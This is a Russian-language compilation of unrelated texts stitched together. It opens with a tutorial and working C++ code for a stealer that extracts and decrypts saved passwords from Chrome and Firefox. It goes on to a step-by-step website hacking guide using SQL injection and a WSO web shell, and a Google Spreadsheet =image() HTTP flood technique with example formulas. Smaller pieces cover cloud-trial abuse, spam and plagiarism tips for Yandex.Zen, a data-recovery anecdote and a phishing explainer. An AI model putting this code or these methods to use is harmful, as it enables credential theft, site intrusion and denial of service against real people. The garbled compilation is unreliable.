Ты наверняка слышал о таком классе зловредных приложений, как стилеры. Их задача — вытащить из системы жертвы ценные данные, в первую очередь — пароли. В этой статье я расскажу, как именно они это делают, на примере извлечения паролей из браузеров Chrome и Firefox и покажу примеры кода на C++.

WARNING

Весь код в статье приводится исключительно в образовательных целях и для восстановления собственных утерянных паролей. Похищение чужих учетных или других личных данных без надлежащего письменного соглашения карается по закону.

Итак, браузеры, в основе которых лежит Chrome или Firefox, хранят логины и пароли пользователей в зашифрованном виде в базе SQLite. Эта СУБД компактна и распространяется бесплатно по свободной лицензии. Так же, как и рассматриваемые нами браузеры: весь их код открыт и хорошо документирован, что, несомненно, поможет нам.

В примере модуля стилинга, который я приведу в статье, будет активно использоваться CRT и другие сторонние библиотеки и зависимости, типа sqlite.h. Если тебе нужен компактный код без зависимостей, придется его немного переработать, избавившись от некоторых функций и настроив компилятор должным образом. Как это сделать, я показывал в статье «Тайный WinAPI. Как обфусцировать вызовы WinAPI в своем приложении».

Что скажет антивирус?

Рекламируя свои продукты, вирусописатели часто обращают внимание потенциальных покупателей на то, что в данный момент их стилер не «палится» антивирусом.

Тут надо понимать, что все современные и более-менее серьезные вирусы и трояны имеют модульную структуру, каждый модуль в которой отвечает за что-то свое: один модуль собирает пароли, второй препятствует отладке и эмуляции, третий определяет факт работы в виртуальной машине, четвертый проводит обфускацию вызовов WinAPI, пятый разбирается со встроенным в ОС файрволом.

Так что судить о том, «палится» определенный метод антивирусом или нет, можно, только если речь идет о законченном «боевом» приложении, а не по отдельному модулю.

Chrome

Начнем с Chrome. Для начала давай получим файл, где хранятся учетные записи и пароли пользователей. В Windows он лежит по такому адресу:

C:\Users\%username%\AppData\Local\Google\Chrome\UserData\Default\Login Data

Чтобы совершать какие-то манипуляции с этим файлом, нужно либо убить все процессы браузера, что будет бросаться в глаза, либо куда-то скопировать файл базы и уже после этого начинать работать с ним.

Давай напишем функцию, которая получает путь к базе паролей Chrome. В качестве аргумента ей будет передаваться массив символов с результатом ее работы (то есть массив будет содержать путь к файлу паролей Chrome).

#define CHROME_DB_PATH  "\\Google\\Chrome\\User Data\\Default\\Login Data"

bool get_browser_path(char * db_loc, int browser_family, const char * location) {
    memset(db_loc, 0, MAX_PATH);
    if (!SUCCEEDED(SHGetFolderPath(NULL, CSIDL_LOCAL_APPDATA, NULL, 0, db_loc))) {
        return 0;
    }

    if (browser_family = 0) {
        lstrcat(db_loc, TEXT(location));
        return 1;
    }
}

Вызов функции:

char browser_db[MAX_PATH];
get_browser_path(browser_db, 0, CHROME_DB_PATH);

Давай вкратце поясню, что здесь происходит. Мы сразу пишем эту функцию, подразумевая будущее расширение. Один из ее аргументов — поле browser_family, оно будет сигнализировать о семействе браузеров, базу данных которых мы получаем (то есть браузеры на основе Chrome или Firefox).

Если условие browser_family = 0 выполняется, то получаем базу паролей браузера на основе Chrome, если browser_family = 1 — Firefox. Идентификатор CHROME_DB_PATHуказывает на базу паролей Chrome. Далее мы получаем путь к базе при помощи функции SHGetFolderPath, передавая ей в качестве аргумента CSIDL значение CSIDL_LOCAL_APPDATA, которое означает:

#define CSIDL_LOCAL_APPDATA 0x001c // <user name>\Local Settings\Applicaiton Data (non roaming)

Функция SHGetFolderPath устарела, и в Microsoft рекомендуют использовать вместо нее SHGetKnownFolderPath. Проблема в том, что поддержка этой функции начинается с Windows Vista, поэтому я применил ее более старый аналог для сохранения обратной совместимости. Вот ее прототип:

HRESULT SHGetFolderPath(      
    HWND hwndOwner,
    int nFolder,
    HANDLE hToken,
    DWORD dwFlags,
    LPTSTR pszPath
);

После этого функция lstrcat совмещает результат работы SHGetFolderPath с идентификатором CHROME_DB_PATH.

База паролей получена, теперь приступаем к работе с ней. Как я уже говорил, это база данных SQLite, работать с ней удобно через SQLite API, которые подключаются с заголовочным файлом sqlite3.h. Давай скопируем файл базы данных, чтобы не занимать его и не мешать работе браузера.

int status = CopyFile(browser_db, TEXT(".\\db_tmp"), FALSE);
if (!status) {
    // return 0;
}

Теперь подключаемся к базе командой sqlite3_open_v2. Ее прототип:

int sqlite3_open_v2(
    const char *filename,   /* Database filename (UTF-8) */
    sqlite3 **ppDb,         /* OUT: SQLite db handle */
    int flags,              /* Flags */
    const char *zVfs        /* Name of VFS module to use */
);

Первый аргумент — наша база данных; информация о подключении возвращается во второй аргумент, дальше идут флаги открытия, а четвертый аргумент определяет интерфейс операционной системы, который должен использовать это подключение к базе данных, в нашем случае он не нужен. Если эта функция отработает корректно, возвращается значение SQLITE_OK, в противном случае возвращается код ошибки.

sqlite3 *sql_browser_db = NULL;

status = sqlite3_open_v2(TEMP_DB_PATH, 
                &sql_browser_db, 
                SQLITE_OPEN_READONLY, 
                NULL);
if(status != SQLITE_OK) {
    sqlite3_close(sql_browser_db);
    DeleteFile(TEXT(TEMP_DB_PATH));
}

INFO

Обрати внимание: при некорректной отработке функции нам все равно необходимо самостоятельно закрыть подключение к базе и удалить ее копию.

Теперь начинаем непосредственно обрабатывать данные в базе. Для этого воспользуемся функцией sqlite3_exec().

status = sqlite3_exec(sql_browser_db, 
            "SELECT origin_url, username_value, password_value FROM logins", 
            crack_chrome_db, 
            sql_browser_db, 
            &err);
if (status != SQLITE_OK)
    return 0;

Эта функция имеет такой прототип:

int sqlite3_exec(
    sqlite3*,                                  /* An open database */
    const char *sql,                           /* SQL to be evaluated */
    int (*callback)(void*,int,char**,char**),  /* Callback function */
    void *,                                    /* 1st argument to callback */
    char **errmsg                              /* Error msg written here */
);

Первый аргумент — наша база паролей, второй — это команда SQL, которая вытаскивает URL файла, логин, пароль и имя пользователя, третий аргумент — это функция обратного вызова, которая и будет расшифровывать пароли, четвертый — передается в нашу функцию обратного вызова, ну а пятый аргумент сообщает об ошибке.

Давай остановимся подробнее на callback-функции, которая расшифровывает пароли. Она будет применяться к каждой строке из выборки нашего запроса SELECT. Ее прототип — int (*callback)(void*,int,char**,char**), но все аргументы нам не понадобятся, хотя объявлены они должны быть. Саму функцию назовем crack_chrome_db, начинаем писать и объявлять нужные переменные:

int crack_chrome_db(void *db_in, int arg, char **arg1, char **arg2) {

DATA_BLOB data_decrypt, data_encrypt;
sqlite3 *in_db = (sqlite3*)db_in;
BYTE *blob_data = NULL;
sqlite3_blob *sql_blob = NULL;

char *passwds = NULL;

while (sqlite3_blob_open(in_db, "main", "logins", "password_value", count++, 0, &sql_blob) != SQLITE_OK && count <= 20 );

В этом цикле формируем BLOB (то есть большой массив двоичных данных). Далее выделяем память, читаем блоб и инициализируем поля DATA_BLOB:

int sz_blob;
int result;

sz_blob = sqlite3_blob_bytes(sql_blob);
dt_blob = (BYTE *)malloc(sz_blob);

if (!dt_blob) {
    sqlite3_blob_close(sql_blob);
    sqlite3_close(in_db);
}

data_encrypt.pbData = dt_blob;
data_encrypt.cbData = sz_blob;

А теперь приступим непосредственно к дешифровке. База данных Chrome зашифрована механизмом Data Protection Application Programming Interface (DPAPI). Суть этого механизма заключается в том, что расшифровать данные можно только под той учетной записью, под которой они были зашифрованы. Другими словами, нельзя стащить базу данных паролей, а потом расшифровать ее уже на своем компьютере. Для расшифровки данных нам потребуется функция CryptUnprotectData.

DPAPI_IMP BOOL CryptUnprotectData(
    DATA_BLOB                 *pDataIn,
    LPWSTR                    *ppszDataDescr,
    DATA_BLOB                 *pOptionalEntropy,
    PVOID                     pvReserved,
    CRYPTPROTECT_PROMPTSTRUCT *pPromptStruct,
    DWORD                     dwFlags,
    DATA_BLOB                 *pDataOut
);

if (!CryptUnprotectData(&data_encrypt, NULL, NULL, NULL, NULL, 0, &data_decrypt)) {
    free(dt_blob);
    sqlite3_blob_close(sql_blob);
    sqlite3_close(in_db);
}

После этого выделяем память и заполняем массив passwds расшифрованными данными.

passwds = ( char *)malloc(data_decrypt.cbData + 1);
memset(passwds, 0, data_decrypt.cbData);

int xi = 0;
while (xi < data_decrypt.cbData) {
    passwds[xi] = (char)data_decrypt.pbData[xi];
    ++xi;
}

Собственно, на этом все! После этого passwds будет содержать учетные записи пользователей и URL. А что делать с этой информацией — вывести ее на экран или сохранить в файл и отправить куда-то его — решать тебе.

Firefox

Переходим к Firefox. Это будет немного сложнее, но мы все равно справимся!

Для начала давай получим путь до базы данных паролей. Помнишь, в нашей универсальной функции get_browser_path мы передавали параметр browser_family? В случае Chrome он был равен нулю, а для Firefox поставим 1.

bool get_browser_path(char * db_loc, int browser_family, const char * location) {
    ...
    if (browser_family = 1) {
        memset(db_loc, 0, MAX_PATH);
        if (!SUCCEEDED(SHGetFolderPath(NULL, CSIDL_LOCAL_APPDATA, NULL, 0, db_loc))) {
            // return 0;
        }

В случае с Firefox мы не сможем, как в Chrome, сразу указать путь до папки пользователя. Дело в том, что имя папки пользовательского профиля генерируется случайно. Но это ерундовая преграда, ведь мы знаем начало пути (\\Mozilla\\Firefox\\Profiles\\). Достаточно поискать в нем объект «папка» и проверить наличие в ней файла \\logins.json«. Именно в этом файле хранятся интересующие нас данные логинов и паролей. Разумеется, в зашифрованном виде. Реализуем все это в коде.

lstrcat(db_loc, TEXT(location));

// Объявляем переменные
const char * profileName = "";
WIN32_FIND_DATA w_find_data;
const char * db_path = db_loc;

// Создаем маску для поиска функцией FindFirstFile
lstrcat((LPSTR)db_path, TEXT("*"));

// Просматриваем, нас интересует объект с атрибутом FILE_ATTRIBUTE_DIRECTORY
HANDLE gotcha = FindFirstFile(db_path, &w_find_data);

while (FindNextFile(gotcha, &w_find_data) != 0){
    if (w_find_data.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) {
        if (strlen(w_find_data.cFileName) > 2) {
            profileName = w_find_data.cFileName;
        }
    }
}
// Убираем звездочку :)
db_loc[strlen(db_loc) - 1] = '\0';

lstrcat(db_loc, profileName); 

// Наконец, получаем нужный нам путь
lstrcat(db_loc, "\\logins.json");

return 1;

В самом конце переменная db_loc, которую мы передавали в качестве аргумента в нашу функцию, содержит полный путь до файла logins.json, а функция возвращает 1, сигнализируя о том, что она отработала корректно.

Теперь получим хендл файла паролей и выделим память под данные. Для получения хендла используем функцию CreateFile, как советует MSDN.

DWORD read_bytes = 8192;
DWORD lp_read_bytes;

char *buffer = (char *)malloc(read_bytes);
HANDLE db_file_login = CreateFileA(original_db_location, 
                GENERIC_READ, 
                FILE_SHARE_READ|FILE_SHARE_WRITE|FILE_SHARE_DELETE, 
                NULL, OPEN_ALWAYS, 
                FILE_ATTRIBUTE_NORMAL,  
                NULL);

ReadFile(db_file_login, buffer, read_bytes, &lp_read_bytes, NULL);

Все готово, но в случае с Firefox все не будет так просто, как с Chrome, — мы не сможем просто получить нужные данные обычным запросом SELECT, да и шифрование не ограничивается одной-единственной функцией WinAPI.

Network Security Services (NSS)

Браузер Firefox активно использует функции Network Security Services для реализации шифрования своей базы. Эти функции находятся в динамической библиотеке, которая лежит по адресу C:\Program Files\Mozilla Firefox\nss3.dll.

Все интересующие нас функции нам придется получить из этой DLL. Сделать это можно стандартным образом, при помощи LoadLibrary\GetProcAdress. Код однообразный и большой, поэтому я просто приведу список функций, которые нам понадобятся:

• NSS_Init;
• PL_Base64Decode;
• PK11SDR_Decrypt;
• PK11_Authenticate;
• PK11_GetInternalKeySlot;
• PK11_FreeSlot.

Это функции инициализации механизма NSS и расшифровки данных. Давай напишем функцию расшифровки, она небольшая. Я добавлю комментарии, чтобы все было понятно.

char * data_uncrypt(std::string pass_str) {
    // Объявляем переменные
    SECItem crypt;  
    SECItem decrypt;
    PK11SlotInfo *slot_info;

    // Выделяем память для наших данных
    char *char_dest = (char *)malloc(8192); 
    memset(char_dest, NULL, 8192);
    crypt.data = (unsigned char *)malloc(8192);
    crypt.len = 8192;
    memset(crypt.data, NULL, 8192);

    // Непосредственно расшифровка функциями NSS
    PL_Base64Decode(pass_str.c_str(), pass_str.size(), char_dest);
    memcpy(crypt.data, char_dest, 8192);
    slot_info = PK11_GetInternalKeySlot();
    PK11_Authenticate(slot_info, TRUE, NULL);
    PK11SDR_Decrypt(&crypt, &decrypt, NULL);
    PK11_FreeSlot(slot_info);

    // Выделяем память для расшифрованных данных
    char *value = (char *)malloc(decrypt.len);
    value[decrypt.len] = 0;
    memcpy(value, decrypt.data, decrypt.len);

    return value;
}

Теперь осталось парсить файл logins.json и применять нашу функцию расшифровки. Для краткости кода я буду использовать регулярные выражения и их возможности в C++ 11.

string decode_data = buffer;

// Определяем регулярную последовательность для сайтов, логинов и паролей
regex user("\"encryptedUsername\":\"([^\"]+)\"");
regex passw("\"encryptedPassword\":\"([^\"]+)\"");
regex host("\"hostname\":\"([^\"]+)\"");

// Объявим переменную и итератор
smatch smch;
string::const_iterator pars(decode_data.cbegin());

// Парсинг при помощи regex_search, расшифровка данных нашей функцией data_uncrypt
// и вывод на экран расшифрованных данных
do {
    printf("Site\t: %s", smch.str(1).c_str());
    regex_search(pars, decode_data.cend(), smch, user);
    printf("Login: %s", data_uncrypt(smch.str(1)));

    regex_search(pars, decode_data.cend(), smch, passw);
    printf("Pass: %s",data_uncrypt( smch.str(1)));

    pars += smch.position() + smch.length();

} while (regex_search(pars, decode_data.cend(), smch, host));

Заключение

Мы разобрались, как хранятся пароли в разных браузерах, и узнали, что нужно делать, чтобы их извлечь. Можно ли защититься от подобных методов восстановления сохраненных паролей? Да, конечно. Если установить в браузере мастер-пароль, то он выступит в качестве криптографической соли для расшифровки базы данных паролей. Без ее знания восстановить данные будет невозможно.

А интересен он тем, что из полностью обнулённой USB флешки, мы удачно восстановили данные. Если интересно как? Добро пожаловать под кат…

Предложение отформатировать накопитель Windows выдаёт в тех случаях, когда не может определить на устройстве файловую структуру, вот и предлагает создать новую, путём форматирования.

В нашем случае нужны данные и форматировать нельзя. Смотрим дисковым редактором, что же случилось с файловой структурой.

WinHex:

Опаньки… Все! Все 32 гигабайта «залиты» нулями… Данных нет! Шеф, всё пропало.

Сразу спрашиваем клиента, не давал ли кому? и тот злобный товарищ не запускал ли утилиты ремонта? Ответ: Нет, сразу к вам.

Если флешку ни кто не «прошивал» и не записывал её паттерном, то не могла же она в миг обнулиться, на это требуется время и действие.

Ок, русские не сдаются. Спаяем микросхему и посмотрим содержимое памяти напрямую, в обход контроллера. В данном случае в одном корпусе два кристалла, Вместе со служебной информацией получается два дампа по 18гб.

В дампе не нули, но это ещё ни о чём не говорит, так как на современных флешках контроллер пишет данные не в явном виде, а через XOR операцию.

Если все блоки одинаковы, то да, накопитель залит одним и тем же. Но нам повезло они разные, а это данные!

Нужно подобрать ксор, и собрать блоки в нужной последовательности по алгоритму контроллера.

Пошаманим ростовским комплексом

И вауля, 26 гигабайт данных, 9000 файлов, битых из них 900. К сожалению картинку с данными мы не имеем права выкладывать, так как у нас в конторе конфиденциальность превыше всего.

В заключении этой мини истории со счастливым концом (клиент сначала расстроился, что там одни нули), нужно написать почему не все файлы корректно восстановились.

Качество современных чипов памяти весьма печальное, и несмотря на громогласные заявления производителей о том, что вот мы сделали огромное количество циклов записи… статистика показывает обратное. Износ происходит очень быстро, по сравнению с флешками которые измерялись мегабайтами. Ну не будем об этом здесь и сейчас.

Касательно этого случая, флешка умирала и «сигнализировала» об этом косвенным путём, а именно: запускалась проверка диска, результат работы чекдиска — папка FOUND, в восстановленных данных присутствует. Это уже были первые звоночки, что она «сыпется».

Контроллер увидел, что количество плохих ячеек памяти уже огромное и сделал такой «финт ушами» как, отдача в интерфейс нулей.

Нам же пришлось вычитывать битые сектора, многократным чтением, какие-то из них удалось прочитать или восстановить из ECC. Как результат – клиент доволен. А начиналось то всё, с пустого места…

Статья написана для тех, для кого хакер - это человек, у которого на мониторе бегают зелёные циферки. Что-нибудь серьезное взломать этим методом не получится, ну или получится.

Подготовка.

1. Инструментарий.

Нам потребуется всего 3 из множества. Более того, подойдут даже демо-версии:

а) Xspider - сканирует сервер и сайт на открытые порты и по своей базе уязвимостей. Демо-версия не пишет где именно они были найдены, но отвечает на жопу что они есть. Нам этого достаточно.

б) Havij - так как мы будем взламывать онли через sql-inj, то лучше не найти. Тут лучше кряк поискать ибо не все базы во фришной версии поддерживаются, благо, кряки гуглятся мгновенно.

в) WSO 2.5.1 (web shell). Чтобы то, чем вы занимаетесь выглядело как настоящее хакерство.

2. Защита жопы.

Это на вкус и цвет, vpn + прокси хватает вполне. Если не будет дефейсов/удаления/прочих неприятных/видимых админу штук, то вас, скорее всего, даже не заметят.

3. Поехали.

Ищем цель, тут всё просто. Пишите в гугле любое слово и жмёте искать. Берёте нужный сайт и засовываете в Xspider, жмёте сканировать. Попутно идёте на 2ip.ru например и ищете сайты-соседушки вашего уже почти взломанного сайта с баблом. Хватаете их и закидываете в Хспайдер тоже. Ждём...

Предположим Xspider справился и нашёл что-то. Открываем засранца и смотрим что у нас там в 80 / tcp - HTTP. Ура! Там SQL-inj написано красненьким. Нам сегодня везёт, продолжаем.

Так как он не пишет где же эта скуля нашлась мы спросим у гугла. Пишем запрос:

site:жертва.ру inurl:=

Нам покажутся все ссылки с параметрами

Они-то нам и нужны.

33% сделано.

Запускаем Havij.

В target вписываем ссылочку как в примере. Она должна быть похожа на ту, которой с нами поделился достопочтенный Гугол.

Ничего больше нажимать не надо, пусть этим занимаются те, кому не насрать. Жмём Analyze. Заработало! Буковки побежали. Для большего эффекта поставьте полноэкранный режим. Если ничего не получилось, то хер с ним, этот сайт не достоин нашего внимания идём дальше. Если получилось и db found, то во вкладке tables жмём поочереди слева направо кнопки гет дб, гет таблес (плохая память но что-то в этом духе). Теперь ищем что-нибудь похожее на user, admin, и т.д. Открываем их, ставим галочки на чём-нибудь похожем на login, pass и далее Get Data.

Если вам повезёт, вы получите сразу и логин и пароль. Но обычно пароль шифруется

и нам приходится идти к нашему другу Гуглу и тупо вбиваем хэш в него. Вот тут немного полазим и поищем его, в огромных списках быстрее будет нажать Ctrl+F и туда уже засунуть пароль.

Итак. У нас есть логин и пароль админа. Что дальше? Открываем Havij и жмём на кнопочку Find Admin там только одна графа и одна кнопка, так что разберётесь.

4. Админка.

На этом можно, в принципе, остановиться. Но нас достижение цели не останавливает и мы хотим больше. Сейчас будет мало конкретики ибо видов разных админок долбаная куча. Ищите в админке любой способ загрузки файла, а лучше файл-менеджер и загружаете наш WSO шелл. ВАЖНО. посмотрите в какую папку происходят загрузки или в какую вы его загружаете, меняется ли имя и тд. В общем, нам нужен его конкретный адрес, на который мы заходим и в окне пароля пишем root. Вы восхитительны и перед вами внутренности сайта, можете веселиться, сливать базы, лазать-копаться и т.д. Опционально перезалейте и переименуйте шелл куда-нибудь, где он будет не особо заметен.

--

Если что-то на любой стадии не получается, то просто ищем другую жертву и заново. Когда-нибудь точно получится.

Google использует своего «паука» FeedFetcher для кэширования любого контента в Google Spreadsheet, вставленного через формулу =image(«link»).

https://docs.google.com/spreadsheet/

Например, если в одну из клеток таблицы вставить формулу

Код:

=image("http://example.com/image.jpg")

Google отправит паука FeedFetcher скачать эту картинку и закэшировать для дальнейшего отображения в таблице.

Однако, если добавлять случайный параметр к URL картинки, FeedFetcher будет скачивать её каждый раз заново. Скажем, для примера, на сайте жертвы есть PDF-файл размером в 10 МБ. Вставка подобного списка в таблицу приведет к тому, что паук Google скачает один и тот же файл 1000 раз!

Код:

=image("http://targetname/file.pdf?r=1")

=image("http://targetname/file.pdf?r=2")

=image("http://targetname/file.pdf?r=3")

=image("http://targetname/file.pdf?r=4")

...

=image("http://targetname/file.pdf?r=1000")

Все это может привести к исчерпанию лимита трафика у некоторых владельцев сайтов. Кто угодно, используя лишь браузер с одной открытой вкладкой, может запустить массированную HTTP GET FLOOD-атаку на любой веб-сервер.

Атакующему даже необязательно иметь быстрый канал. Поскольку в формуле используется ссылка на PDF-файл (т.е. не на картинку, которую можно было бы отобразить в таблице), в ответ от сервера Google атакующий получает только N/A. Это позволяет довольно просто многократно усилить атаку [Аналог DNS и NTP Amplification – прим. переводчика], что представляет серьезную угрозу.

С использованием одного ноутбука с несколькими открытыми вкладками, просто копируя-вставляя списки ссылок на файлы по 10 МБ, паук Google может скачивать этот файл со скоростью более 700 Мбит/c.

В моем случае, это продолжалось в течение 30-45 минут, до тех пор, пока я не вырубил сервер. Если я все правильно подсчитал, за 45 минут ушло примерно 240GB трафика.

Пошагово:

1. Регистрируем аккаунт в Яндексе.

2. Привязываем номер.

3. Идем сюда cloud.yandex.ru 

4. Нажимаем "Принять"

5. Привязываем карту (Qiwi-виртуал не работает, но работают другие)

6. Профит - получаем баланс 4 000 РУБ на 2 месяца.

7. После создания дедика отвязываем карту и не беспокоимся о чем либо.

Постараюсь вам понятным языком поведать все, что знаю.

Яндекс.Дзен это платформа, на которой мы можем стать авторами - писать говнотексты и за это получать бабулеты. Деньги идут за счет того, что Яндекс интегрирует в нашу статью рекламу.

Когда я сделал свой первый канал, мне удалось зарабатывать по 2К/день. Деньги можно выводить на Яндекс.Деньги или PayPal (любые счета) - мгновенно. Тематика канала была 18+, это запрещено (на самом деле нет, нужно просто писать с научной точки зрения, но это постоянная игра с бритвой у яиц).

Так выглядит лента у пользователя. Так же Яндекс пихает посты в других местах: на главной, в почте, где угодно. Аудитория Дзена огромная.

Первое, что нужно уяснить, это то, что писать нам нихера не нужно качественно. Люди любят читать всякое говно уровня "ТОП-10 самых красивых баб" или "Муж ушёл за грибами и его своровали инопланетяне". Длина статьи - тоже маловажный фактор. Мне попадались посты, где одна картинка и одно предложение, такой пост собрал довольно много просмотров. У меня был пост с заголовком "Учительница занялась сексом с учеником". Пост собрал 25К показов. Один этот пост принёс более 2К рублей (пост был формата нарратив).

Нарратив - это такой тип поста, что-то вроде сторис в инстаграм. Такие посты показываются аудитории на мобильных платформах.

Статья - простой тип поста, текст + картинки.

Чтобы начать зарабатывать, нужно собрать 7000 дочитываний за последние 7 дней. Это может быть проблемой для новичков, потому что они пишут не на те темы, которые заходят аудитории. Как только собираем эти дочитывания - отправляем им свои паспортные данные, спустя 1-3 суток они верифицируют и мы можем выводить деньги на свой кошелек.

Кто-то выводит свой канал за сутки, кто-то за пять суток. У меня был опыт вывода канала на монету за 12 часов.

1000 просмотров статьи приносят порядка 40 рублей, 1000 просмотров нарратива - около 80 рублей.

Как ранжируются посты:

1) CTR (кликабельность по посту в ленте). Если по нему кликают часто, то пост показывается большему числу аудитории. Это самый сильный фактор.

2) Фидбек. Это как долго читают статью, как часто ставят лайки, делают репосты.

3) Внешняя оптимизация. Если адрес канала/поста упоминают на других сайтах, то канал считается более качественным.

4) Контентные факторы - качество нашего материала.

Понимая важность CTR можно понять, что самое главное это привлекательность заголовка и картинки.

Вот пример поста

Вот содержимое поста (это нарратив)

Ориентировачно этот пост принес 800 рублей. Это совсем не показательный пост, но хороший. На его создание ушло минут 10 (картинки у меня заготовлены).

Текст должен быть уникальным. Можно проверять уникальность на text.ru

Есть некоторые способы добычи уникального текста, например достать из удаленного сайта, либо переводы. Статьи можно покупать у копирайтеров или на бирже etxt.ru

Рекомендую делать статью и тут же её же копировать в формат нарратив. Это не запрещено и увеличивает просмотры. Так же может зайти нарратив и принести 10К просмотров, а у статьи будет всего 500.

На данный момент я трачу 30-60 минут в день, заработок 1-1.5К в день. Был перерыв в пару недель, но этого перерыва было стабильно 2-2.5К в день. Все это с одного канала.

Какое-то время придётся потратить, чтобы понять какие заголовки/картинки заходят и как писать быстро и мало, но иметь большой профит.

Каждое слово вашего заголовка должно вызывать определенные эмоции у читателя. Именно тогда будет достигнута основная цель – привлечение внимания и вовлечение. Аудитория должна сопереживать, негодовать, ожидать и предугадывать. Используйте эффективные слова и их сочетания, и тогда вы поймете, что половина успеха статьи заложена в самом ее названии.

Регистрироваться в Дзене нужно по ссылке: http://zen.yandex.ru/media/ 

Вот чьи-то результаты:

Это не единственный способ заработка. С Дзена можно арбитражить на свои офферы. Например услуги. Вспомним ту тему по продвижению курсов для похудения в Инсте. Почему бы не попробовать в Дзене, раз уж там такая огромная аудитория?

А вот еще классная инфа: примеры привлекательных заголовков.

100 отличных заголовков для постов

... — правда или обман?

... (число) горячих ... этого сезона

... (число) идей лучшего...

... (число) основных преимуществ...

... (число) очевидных фактов о...

... (число) причин использовать...

... (число) простых решений проблемы...

... (число) советов для ...

... (число) способов улучшить...

... и вы сможете гордиться собой

... как основа...

... простых способов повысить ... всего за 1 год

... способов ..., когда вы не ...

...(число) — минутное решение проблемы...

9 из 10 людей уже... Вы один из них?

А вы знали о...?

Быстрый способ...

Вот метод, который поможет вам...

Вот рецепт успешного ...

Вот что надо знать о...

Все о...

Все тайны ... из первых уст

Вы будете нам благодарны за...

Вы все еще тратите деньги на...?

Главные тренды...

Дайте нам 30 минут и...

Действительно ли ... — единственный способ ...?

Действительно ли плох ...?

Доказано, что ...

Единственный способ...

Если вы можете ..., значит вы...

За ... можно не платить

Забудьте о...

Заработайте ...$ его за полчаса

Избавьтесь от ... навсегда

Как ... воздействует на вас. И как этого избежать.

Как ... каждый день

Как ... облегчит вашу жизнь

Как ... поможет сэкономить кучу времени

Как ..., когда все средства уже испробованы

Как достичь ... за неделю

Как избавиться от...

Как использовать ..., чтобы увеличить ...

Как пережить ваш первый ...

Как повысить ... с помощью ...

Как получить ..., не делая практически ничего

Как получить невероятный результат с помощью всего лишь...

Как сколотить ...$ c помощью ...

Как создать хороший ...

Как увеличить прибыль в ...(число) раз за счет...

Конкуренция вам не страшна с...

Кто еще хочет...?

Кто не любит... (осуждаемое, незаконное, аморальное)

Легкий способ...

Лучшее ..., которое вы когда - либо видели

Лучшее решение ...

Лучшие идеи для...

Люди платят за эту информации, но вы получите ее бесплатно

Малоизвестные способы

Можно ли ..., не вкладывая ни копейки?

Мой лучший...

Мы больше не ... И вы

не делаете этого!

Мы нашли ответ на вопрос о ...

Мы нашли средство от ...

На пути к цели мы ... Хотите знать, почему?

Не стоит жалеть о ..., ведь существует ...

Невероятно, но...

Недавно уволенный ... раскрывает все карты

Неизвестные факты о ...

Несколько самых популярных ...

Несколько уроков...

Опробуйте ... и вы останетесь довольны

Опробуйте эти ...(число) методов и вы получите ...

Позвольте поделиться с вами секретом ...

Полное собрание ...

Почему ... может оказаться неэффективным?

Почему ... не дал желаемого результата?

Почему ваш ... неэффективен и как это исправить

Почему никто не знает о ...

Практическое руководство по...

Представьте ... Мы сделали это!

Простое решение непростой задачи

Руководство по...

Самое время ...

Самый быстрый способ...

Секрет... (кого? чего?)

Секретные пути достижения ...

Секреты профессионалов...

Скрытые от глаз стороны ...

Создаем эффективный...

Теперь вы можете...

Хватит ли у вас смелости на ... ?

Хотите ли вы больше покупателей?

Что ... могут предложить вам?

Что говорят исследования о ...

Что делать, если...

Что должен знать каждый...

Что нужно применить в вашей следующей...

Что стоит знать, чтобы избежать...

Это должен знать каждый

Сделать 5К с одного канала - вполне реально. Уж поверьте. Пока самый смачный кейс, что я видел - чувак на дзене сделал 8К за день, с нескольких каналов. Думаю и это не предел.

Несколько лайфхаков.

В последствии, когда раскрутите свой канал до оборотов 10к дочитываний в день, можно заказывать копирай и рерайт статей на https://text.ru/ а разницу в прибыли забирать себе. Тут несколько выгод: во первых экономия времени, поскольку попросту можете не успевать каждый день штамповать несколько статей, во вторых дополнительный источник идей для статей со стороны. Всё же у каждого может случит��ся творческий кризис.

Можно так же брать часть статьи с одного ресурса, и с другого, а в последствии объединять в одну. Тогда алгоритмы яндекса не распознают материал как копипасту.

Есть не совсем белые схемы заработка с дзена, но в этом пыткие умы разберутся сами. Намёк я дал, дерзайте.

• Запрос «взлом Gmail» или «взлом Google» – это второй по популярности вопрос для взлома учетной записи в Интернете, конкурирующий только с «взломом учетной записи Facebook».
• Люди думают, что взломать учетную запись «Gmail» легко, и все, что им нужно, – это найти подходящий инструмент для взлома (напрямую или удаленно), но это не так. Мы обнаружили, что вы можете найти огромное количество инструментов для взлома по всему Интернету. Однако, все они поддельны, так как хакеру не зачем делиться рабочим инструментом для взлома, ведь его цель – личное обогащение. И выкладывать в Интернет свой инструмент бесплатно никто не будет.
• Тогда почему все же некоторые аккаунты учетной записи «Gmail» оказываются взломанными, если нет инструмента для взлома? Нет простого способа взломать учетную запись, но это не значит, что такое невозможно. Да, такие способы существуют. Мы подготовили подробный список того, как хакеры могут взломать учетную запись «Gmail/Google» и профилактические меры по ее защите.

1. Фишинг

Фишинг является наиболее распространенным методом, используемым для взлома пароля учетной записи «Gmail», и имеет самый высокий коэффициент успеха, по сравнению с другими способами взлома, из-за высокой схожести внешнего вида и макета сайта с оригиналом. Для получения фишинговой страницы не требуется особых технических знаний, поэтому фишинг широко используется для взлома паролей «Gmail».

Как работает фишинг?

Простыми словами, фишинг – это процесс создания дублированной копии страницы известного сайта в целях кражи пароля пользователя или другой важной информации, такой как данные кредитной карты. Применительно к нашей теме, это создание страницы, которая выглядит так же, как и страница входа в «Gmail», но имеющая другой URL-адрес. Например, gooogle.com или gmaail.com или любой другой URL-адрес, очень похожий на оригинал. Когда пользователь переходит на такую страницу, он может не заметить обман и принять ее за настоящую страницу входа в «Gmail», и ввести свои имя пользователя и пароль. Таким образом, пользователь который не смог распознать фишиноговую страницу, может ввести свою регистрационную информацию. Она моментально будет отправлена хакеру, который создал поддельную страницу, а жертва будет перенаправлена на исходную страницу «Gmail».

